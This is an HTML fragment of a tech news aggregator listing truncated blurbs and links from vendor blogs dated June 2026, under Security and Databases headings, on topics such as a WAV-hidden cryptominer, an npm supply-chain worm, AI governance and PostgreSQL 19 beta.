          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>See how New Relic and Microsoft are embedding Intelligent Observability into Azure workflows and what we’ve built for teams deploying AI in production.</p>
<p><strong>📅 Jun 2, 2026</strong> • <strong>📰 New Relic Blog</strong></p>
<p><a href="https://newrelic.com/blog/news/microsoft-build-2026"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-security" class="group relative scroll-mt-24">
        <a href="#h2-security" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔐 Security
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-security"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="group relative scroll-mt-24">
        <a href="#h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Threats Making WAVs - Incident Response to a Cryptomining Attack
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-threats-making-wavs-incident-response-to-a-cryptomining-attack"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Guardicore security researchers describe and uncover a full analysis of a cryptomining attack, which hid a cryptominer inside WAV files. The report includes the full attack vectors, from detection, in</p>
<p><strong>📅 Jun 8, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/threats-making-wavs-incident-reponse-cryptomining-attack"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-what-is-ai-governance-frameworks-principles-and-best-practices" class="group relative scroll-mt-24">
        <a href="#h3-what-is-ai-governance-frameworks-principles-and-best-practices" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What is AI Governance? Frameworks, Principles, and Best Practices
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-what-is-ai-governance-frameworks-principles-and-best-practices"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AI agents are moving fast. According to our State of Agentic AI report, 60% of organizations already have AI agents in production, yet 40% cite security and compliance as the number-one barrier to sca</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/what-is-ai-governance/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-secure-code-warrior-leverages-ai-to-extend-devsecops-training-reach" class="group relative scroll-mt-24">
        <a href="#h3-secure-code-warrior-leverages-ai-to-extend-devsecops-training-reach" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Secure Code Warrior Leverages AI to Extend DevSecOps Training Reach
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-secure-code-warrior-leverages-ai-to-extend-devsecops-training-reach"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Secure Code Warrior this week extended the capability of its artificial intelligence (AI) agent to make it possible to surface relevant training insights in real time as application developers are wri</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/secure-code-warrior-leverages-ai-extend-devsecops-training-reach/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-build-security-into-itops-from-the-start-with-automation" class="group relative scroll-mt-24">
        <a href="#h3-build-security-into-itops-from-the-start-with-automation" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Build security into ITOps from the start with automation
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-build-security-into-itops-from-the-start-with-automation"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>It&#39;s no secret that IT operations is a complex area. Teams face demanding workloads, where many tasks have to be completed quickly. Objectives typically focus on smooth and resilient operations, and e</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/build-security-itops-start-automation"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-planning-your-path-forward-from-amazon-linux-2-why-consistency-is-the-ultimate-upgrade" class="group relative scroll-mt-24">
        <a href="#h3-planning-your-path-forward-from-amazon-linux-2-why-consistency-is-the-ultimate-upgrade" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Planning your path forward from Amazon Linux 2: Why consistency is the ultimate upgrade
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-planning-your-path-forward-from-amazon-linux-2-why-consistency-is-the-ultimate-upgrade"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Amazon Linux 2 reaches end of life (EOL) on June 30, 2026. If your migration isn&#39;t already underway, the window to move deliberately rather than reactively is narrowing. Migrating business-critical wo</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/planning-your-path-forward-amazon-linux-2-why-consistency-ultimate-upgrade"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-friday-five-june-5-2026" class="group relative scroll-mt-24">
        <a href="#h3-friday-five-june-5-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Friday Five — June 5, 2026
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-friday-five-june-5-2026"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>InfoWorld - IBM and Red Hat want to become the ‘security clearinghouse’ for open source applications in the enterpriseInfoWorld looks at IBM and Red Hat&#39;s Project Lightwell, a $5 billion initiative ba</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/friday-five-june-5-2026"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-so-you-have-an-ai-security-budget-now-what" class="group relative scroll-mt-24">
        <a href="#h3-so-you-have-an-ai-security-budget-now-what" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 So You Have an AI Security Budget. Now what?
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-so-you-have-an-ai-security-budget-now-what"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>An AI security budget should fund more than visibility. The real priority is unified governance and enforcement across agentic development and production apps.</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/ai-security-budget/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-node-gyp-supply-chain-compromise-a-self-propagating-npm-worm-that-hides-in-bindinggyp" class="group relative scroll-mt-24">
        <a href="#h3-node-gyp-supply-chain-compromise-a-self-propagating-npm-worm-that-hides-in-bindinggyp" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Node-gyp Supply Chain Compromise: A Self-Propagating npm Worm That Hides in binding.gyp
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-node-gyp-supply-chain-compromise-a-self-propagating-npm-worm-that-hides-in-bindinggyp"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>A new npm worm is abusing binding.gyp to trigger node-gyp during install, letting malicious packages run code without lifecycle scripts. It steals credentials, persists in GitHub, and self-propagates </p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/node-gyp-supply-chain-compromise-self-propagating-npm-worm-binding-gyp/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-type-level-security-the-future-of-secure-ai-code-generation" class="group relative scroll-mt-24">
        <a href="#h3-type-level-security-the-future-of-secure-ai-code-generation" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Type Level Security: The future of secure AI code generation?
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-type-level-security-the-future-of-secure-ai-code-generation"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Secure-by-design types can turn common bugs into compile-time errors. This post explores how type-level security could help prevent entire classes of AI-generated vulnerabilities.</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/type-level-security/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-what-is-software-supply-chain-security" class="group relative scroll-mt-24">
        <a href="#h3-what-is-software-supply-chain-security" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What is Software Supply Chain Security?
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-what-is-software-supply-chain-security"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Software supply chain attacks have accelerated faster than most security teams anticipated. Sonatype&#39;s 2026 State of the Software Supply Chain report identified more than 454,000 new malicious package</p>
<p><strong>📅 Jun 3, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/what-is-software-supply-chain-security/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-harness-may-2026-product-updates-60-new-features" class="group relative scroll-mt-24">
        <a href="#h3-harness-may-2026-product-updates-60-new-features" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Harness May 2026 Product Updates: 60+ New Features
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-harness-may-2026-product-updates-60-new-features"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>See 60+ Harness updates from May 2026 across AI-native development, software delivery, security, artifact management, cost visibility, and engineering insights. | Blog</p>
<p><strong>📅 Jun 3, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/shipped-in-may-2026"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-new-security-risks-of-the-agentic-development-lifecycle" class="group relative scroll-mt-24">
        <a href="#h3-the-new-security-risks-of-the-agentic-development-lifecycle" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The New Security Risks of the Agentic Development Lifecycle
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-new-security-risks-of-the-agentic-development-lifecycle"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AI agents are changing how software gets built, and with it, where security risk begins. Learn why securing the process matters as much as securing the code.</p>
<p><strong>📅 Jun 3, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/agentic-development-lifecycle/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-databases" class="group relative scroll-mt-24">
        <a href="#h2-databases" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          💾 Databases
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-databases"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-the-laptop-return-that-broke-a-rag-pipeline" class="group relative scroll-mt-24">
        <a href="#h3-the-laptop-return-that-broke-a-rag-pipeline" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Laptop Return that Broke a RAG Pipeline
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-laptop-return-that-broke-a-rag-pipeline"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Editor’s note: This post originally appeared on The New Stack and is republished with permission. The original version is available here. A few months ago, one of our users filed a bug report that stu</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 TiDB Blog</strong></p>
<p><a href="https://www.pingcap.com/blog/hybrid-search-rag-retrieval-accuracy/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-whats-new-with-google-data-cloud" class="group relative scroll-mt-24">
        <a href="#h3-whats-new-with-google-data-cloud" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What’s new with Google Data Cloud
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-whats-new-with-google-data-cloud"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>June 1 - June 5 Beyond the Query: Powering AI Agents with Bigtable, Firestore &amp; Memorystore Discover the latest advancements in Google Cloud&#39;s NoSQL Database portfolio, including Bigtable, Firestore, </p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/products/data-analytics/whats-new-with-google-data-cloud/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-get-started-with-meko-agent-memory-with-built-in-discernment" class="group relative scroll-mt-24">
        <a href="#h3-get-started-with-meko-agent-memory-with-built-in-discernment" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Get Started with Meko: Agent Memory with Built-in Discernment
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-get-started-with-meko-agent-memory-with-built-in-discernment"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>With Meko, your project context lives in a datapack any MCP-connected client can read. This allows you to switch tools without losing context, share useful information with your team while keeping sel</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 Yugabyte Blog</strong></p>
<p><a href="https://www.yugabyte.com/blog/meko-agent-memory-with-built-in-discernment/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-postgresql-19-beta-1-released" class="group relative scroll-mt-24">
        <a href="#h3-postgresql-19-beta-1-released" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 PostgreSQL 19 Beta 1 Released!
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-postgresql-19-beta-1-released"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The PostgreSQL Global Development Group announces that the first beta release of PostgreSQL 19 is now available for download. This release contains PostgreSQL 19 feature previews ahead of general avai</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/postgresql-19-beta-1-released-3313/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-agentic-supplier-management-with-mongodb-atlas-voyage-ai-and-multi-modal-search" class="group relative scroll-mt-24">
        <a href="#h3-agentic-supplier-management-with-mongodb-atlas-voyage-ai-and-multi-modal-search" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Agentic Supplier Management with MongoDB Atlas, Voyage AI, and Multi-Modal Search
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-agentic-supplier-management-with-mongodb-atlas-voyage-ai-and-multi-modal-search"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Retail supply chains are not a back-office logistics function; they are a high-stakes, board-level concern. Imagine learning suddenly that shipment rerouting surcharges have doubled due to new regiona</p>
<p><strong>📅 Jun 3, 2026</strong> • <strong>📰 MongoDB Blog</strong></p>
<p><a href="https://www.mongodb.com/company/blog/innovation/agentic-supplier-management-with-atlas-voyage-ai-multi-modal-search"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-powering-the-inference-era-inside-the-digitalocean-data-learning-layer" class="group relative scroll-mt-24">
        <a href="#h3-powering-the-inference-era-inside-the-digitalocean-data-learning-layer" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Powering the Inference Era: Inside the DigitalOcean Data & Learning Layer
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-powering-the-inference-era-inside-the-digitalocean-data-learning-layer"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Building an AI-native application requires a data layer that can do two things at once: handle the structured, transactional queries your application runs on, and understand meaning well enough to pow</p>
<p><strong>📅 Jun 3, 2026</strong> • <strong>📰 DigitalOcean Blog</strong></p>
<p><a href="https://www.digitalocean.com/blog/dataandlearning"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ai-reasoning-explained-smarter-models-still-need-context" class="group relative scroll-mt-24">
        <a href="#h3-ai-reasoning-explained-smarter-models-still-need-context" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI reasoning explained: smarter models still need context
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-ai-reasoning-explained-smarter-models-still-need-context"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Every few months, a new AI model drops with higher benchmark scores, and the reaction is predictable: &quot;This one finally reasons.&quot; The leaderboard shuffles. And teams building production AI systems sti</p>
<p><strong>📅 Jun 3, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/ai-reasoning-explained-context-matters/"><strong>🔗 Read more</strong></a></p>
